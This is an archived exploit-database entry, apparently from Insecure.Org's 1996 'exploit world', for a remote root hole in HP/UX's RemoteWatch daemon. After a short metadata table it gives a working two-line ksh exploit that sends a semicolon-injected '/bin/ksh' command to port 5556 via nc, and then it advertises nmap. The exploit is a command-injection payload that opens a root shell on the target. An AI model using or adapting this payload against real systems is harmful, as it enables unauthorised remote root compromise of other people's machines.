(Another) SOD HP/UX RemoteWatch hole
Description: | pathetic daemon |
Author: | Colonel Panic of SOD (sod@command.com.inter.net) |
Compromise: | root or whatever remwatch runs as (remote!) |
Vulnerable Systems: | HP/UX with vulnerable Remote Watch running, probably 9.x, maybe 10.x |
Date: | November 1996 |
Notes: | See the SOD HP Bug of the Week page |
Exploit:
#!/bin/ksh
echo ' 11T ;/bin/ksh' | nc $1 5556
# Yup, that's it. That's the hole.. Believe it.
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: